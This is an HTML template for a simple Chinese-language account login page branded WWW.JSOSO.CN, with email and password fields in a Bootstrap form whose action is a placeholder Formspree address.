<!DOCTYPE html>
<html>

<head>
  <title>帐号登陆</title>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="stylesheet" href="css/font-awesome.min.css" type="text/css">
  <link rel="stylesheet" href="css/theme.css" type="text/css"> </head>
  <link rel="shortcut icon" href="img/bitbug_favicon.ico">
  <link rel="bookmark"  type="image/x-icon"  href="favicon.ico"/>
<body>
  <div class="py-5">
    <div class="container">
      <div class="row">
        <div></div>
      </div>
    </div>
  </div>
  <div class="py-5">
    <div class="container">
      <div class="row">
        <div class="col-md-6" style="transition: all 0.25s;">
          <h2 class="text-center text-danger card-body">WWW.JSOSO.CN </h2>
        </div>
        <div class="col-md-6" style="transition: all 0.25s;">
          <div class="col-md-12" style="transition: all 0.25s;">
            <div class="card text-white p-5 bg-primary">
              <div class="card-body">
                <h1 class="mb-4 text-center">帐号登陆</h1>
                <form action="https://formspree.io/YOUREMAILHERE">
                  <div class="form-group"> <label></label>
                    <input type="email" class="form-control" placeholder="输入邮箱"> </div>
                  <div class="form-group"> <label></label>
                    <input type="password" class="form-control" placeholder="输入密码"> </div>
                  <button type="submit" class="btn btn-secondary">登陆</button>
                </form>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>
  </div>
  <script src="js/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
  <script src="js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
  <script src="js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
</body>

</html>